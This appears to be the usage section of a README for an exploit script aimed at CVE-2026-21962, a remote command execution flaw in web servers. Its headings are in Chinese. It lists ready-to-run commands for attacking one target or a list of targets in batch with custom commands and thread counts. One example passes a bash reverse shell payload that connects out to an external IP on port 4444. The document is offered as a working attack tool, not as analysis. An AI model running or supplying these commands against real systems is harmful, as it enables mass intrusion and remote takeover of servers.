
Exploit script for CVE-2026-21962, enabling remote command execution on vulnerable web servers with single-target, batch, and reverse shell modes.
CVE-2026-21962
EXAMPLE 单目标
python3 CVE-2026-21962.py http://target:7001 -c "whoami"
批量 + 默认 whoami
python3 CVE-2026-21962.py -f url.txt
批量 + 自定义命令 + 改线程数
python3 CVE-2026-21962.py -f url.txt -c "id" --threads 20 -o result.txt
反弹 shell 示例
python3 CVE-2026-21962.py -f targets.txt -c "bash -c 'bash -i >& /dev/tcp/1.1.1.1/4444 0>&1'"